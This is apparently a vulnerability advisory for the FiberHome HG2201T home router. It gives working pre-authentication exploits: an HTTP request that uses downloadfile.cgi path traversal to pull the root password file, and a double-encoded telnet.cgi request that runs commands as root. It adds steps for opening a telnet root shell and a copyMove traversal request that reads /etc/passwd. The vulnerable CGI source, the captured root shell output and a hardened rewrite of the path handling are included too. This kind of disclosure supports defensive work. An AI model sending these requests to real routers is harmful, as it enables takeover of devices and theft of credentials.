POST /cgi-bin/downloadfile.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 24

downpath=/var/tel_passwd
Then download the archive from
http://192.168.1.1:8080/download.tar
root:<plaintext password>:0:0:root:/:/bin/sh
tianyi:<plaintext password>:0:0:root:/:/bin/sh
Vuln code: /var/WEB-GUI/cgi-bin/downloadfile.cgi
setdownloadfile()
{
    # Read the raw POST body and URL-decode it once
    LINE=`./getpostdata.cgi $CONTENT_LENGTH`
    [ "x$LINE" == "x" ] && READERR=1
    [ "x$LINE" != "x" ] && LINE=`./urldecode.cgi $LINE`
    # Split the body on '&', then each key=value pair on '='
    paramIndex="1"
    CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
    while [ "$CGIParam" != "" ]
    do
        par=`echo "$CGIParam" | cut -d '=' -f 1`
        val=`echo "$CGIParam" | cut -d '=' -f 2`
        if [ "$val" != "" ]; then
            case $par
            in
                "downpath")
                    DOWNPATH=$val    # taken verbatim; no authentication, no path validation
                    ;;
            esac
        fi
        paramIndex=$((paramIndex+1))
        CGIParam=`echo "$LINE&" | cut -d '&' -f $paramIndex`
        is_submit="1"
    done
    if [ "$is_submit" == "1" ]; then
        # The caller-controlled, unquoted path goes straight to tar, which runs as root
        tar -cvf /var/WEB-GUI/download.tar $DOWNPATH >/dev/null 2>&1
    fi
}
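A hardened version of the path handling above, added here as an example and not FiberHome's code: the body is split without piping caller text through echo and cut, and downpath must stay under an assumed allowlisted root (/mnt, the USB mount referred to later on this page) before tar is ever run. The input is assumed to be the POST body after URL decoding, as it is after urldecode.cgi in the original script.

```sh
#!/bin/sh
# Added example, not FiberHome's code: hardened parameter handling for
# downloadfile.cgi. Assumption: downloads are only meant to come from the
# USB mount, so every path must stay under ALLOWED_ROOT. Input is assumed
# to be the POST body after URL decoding, as in the original script.

ALLOWED_ROOT="/mnt"

# Return 0 only if $1 is absolute, under ALLOWED_ROOT, free of ".."
# segments, and made of plain path characters (no spaces, %, ;, $, `).
check_download_path() {
    case "$1" in
        "$ALLOWED_ROOT"/*) ;;
        *) return 1 ;;
    esac
    case "$1" in
        */../*|*/..|*[!A-Za-z0-9/._-]*) return 1 ;;
    esac
    return 0
}

# Pull downpath out of a key=value&key=value body without echo|cut.
# Prints the vetted path and returns 0, or returns 1 (absent or unsafe).
resolve_download_path() {
    old_ifs=$IFS
    IFS='&'; set -f          # split on '&' only, and never glob-expand
    set -- $1
    set +f; IFS=$old_ifs
    for kv in "$@"; do
        case "$kv" in
            downpath=*)
                p=${kv#downpath=}            # keeps any '=' inside the value
                check_download_path "$p" || return 1
                printf '%s\n' "$p"
                return 0 ;;
        esac
    done
    return 1
}

# Replacement for the tail of setdownloadfile(): tar only sees a vetted,
# quoted path, so neither traversal nor word splitting can widen it.
setdownloadfile_hardened() {
    DOWNPATH=$(resolve_download_path "$1") || return 1
    tar -cvf /var/WEB-GUI/download.tar "$DOWNPATH" >/dev/null 2>&1
}
```

Authentication still has to be enforced in front of the CGI; the path check only closes the traversal, not the missing access control.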
Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allow pre-authentication directory traversal for reading arbitrary files.
Vulnerability Type
Incorrect Access Control/Directory Traversal
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/downloadfile.cgi
Attack Type
Remote
POST /cgi-bin/telnet.cgi HTTP/1.1
Host: 192.168.1.1:8080
Connection: close
Content-Length: 38

InputCmd=ping%25231.1.1.1%2523-c%25233
/var/WEB-GUI # cat telnet_output.log
cat telnet_output.log
PING 1.1.1.1 (1.1.1.1): 56 data bytes
64 bytes from 1.1.1.1: seq=0 ttl=55 time=176.370 ms
64 bytes from 1.1.1.1: seq=1 ttl=55 time=177.170 ms
64 bytes from 1.1.1.1: seq=2 ttl=55 time=175.522 ms
--- 1.1.1.1 ping statistics ---
3 packets transmitted, 3 packets received, 0% packet loss
round-trip min/avg/max = 175.522/176.354/177.170 ms
Vuln code: /var/WEB-GUI/cgi-bin/telnet.cgi (note the urldecode and sed steps in the query-string processing: the value is URL-decoded once and then sed replaces %23 with a space, so a space has to be submitted as %2523. To get a shell, run telnetd and log in on port 23 via telnet with the credentials read from /var/tel_passwd and/or telWan_passwd.)
settelnet()
{
    # Read the raw POST body and URL-decode it once
    QUERY_STRING=`./getpostdata.cgi $CONTENT_LENGTH`
    [ "x$QUERY_STRING" == "x" ] && READERR=1
    [ "x$QUERY_STRING" != "x" ] && QUERY_STRING=`./urldecode.cgi $QUERY_STRING`
    # Same '&' / '=' parameter loop as downloadfile.cgi
    paramIndex="1"
    CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
    while [ "$CGIParam" != "" ]
    do
        par=`echo "$CGIParam" | cut -d '=' -f 1`
        val=`echo "$CGIParam" | cut -d '=' -f 2`
        if [ "$val" != "" ]; then
            case $par
            in
                "InputCmd")
                    INPUTCMD=$val
                    # Second decoding step: %23 becomes a space
                    INPUTCMD=`echo "$INPUTCMD" | sed 's/%23/ /g'`
                    ;;
            esac
        fi
        paramIndex=$((paramIndex+1))
        CGIParam=`echo "$QUERY_STRING&" | cut -d '&' -f $paramIndex`
        is_submit="1"
    done
    if [ "$is_submit" == "1" ]; then
        # The caller-supplied string is written to a script and executed as root
        rm /var/WEB-GUI/telnet_* >/dev/null 2>&1
        echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.log
        echo "${INPUTCMD}" >/var/WEB-GUI/telnet_input.sh
        chmod +x /var/WEB-GUI/telnet_input.sh
        cd /var/WEB-GUI/
        ./telnet_input.sh >/var/WEB-GUI/telnet_output.log 2>&1
    fi
    echo "
    {\"RETURN\":
    {\"success\": true}
    }"
}
Shell obtained via telnet:
/var # id
id
uid=0(root) gid=0(root) groups=0(root)
/var # uname -a
uname -a
Linux localhost 3.18.21+ #6 SMP Fri Sep 7 19:28:01 CST 2018 mips GNU/Linux
Description
FiberHome HG2201T 1.00.M5007_JS_201804 devices allow pre-authentication remote code execution.
Vulnerability Type
Incorrect Access Control
Vendor of Product
Fiberhome
Affected Product Code Base
HG2201T - HG2201T_1.00.M5007_JS_201804
Affected Component
/var/WEB-GUI/cgi-bin/telnet.cgi
Attack Type
Remote
The HG2201T runs an HTTP server on both port 80 and port 8080 with firmware version HG2201T_1.00.M5007_JS_201804.
By design, an authenticated user can manage files on a flash drive (if one is plugged in) through the web interface.
However, this file manager can be invoked without a flash drive present, and its paths can easily be traversed (this could be a CVE as well), which yields an arbitrary file read: copying /some/thing to /mnt/usb_x/somewhere while httpd runs with root privileges.
A 'copy to' request looks like this:
POST /cgi-bin/luci/admin/storage/copyMove HTTP/1.1
Host: 192.168.1.1
Cookie: sysauth=<fixed upon login>
Connection: close

token=<fixed upon login>&opstr=copy%7C%2Fetc%2F%7C%2Fvar%2FWEB-GUI%2F%7Cpasswd&fileLists=passwd%2F&_=0.1327969112555747
Key query string (decoded):
opstr=copy|/etc/|/var/WEB-GUI/|passwd&fileLists=passwd
By reviewing the CGI files served on 8080 a little further, we found the pre-auth RCE. Both vulnerable code pieces were hidden in the cgi-bin folder, with no front-end served for them.
Credit: PF7@Chaitin Tech.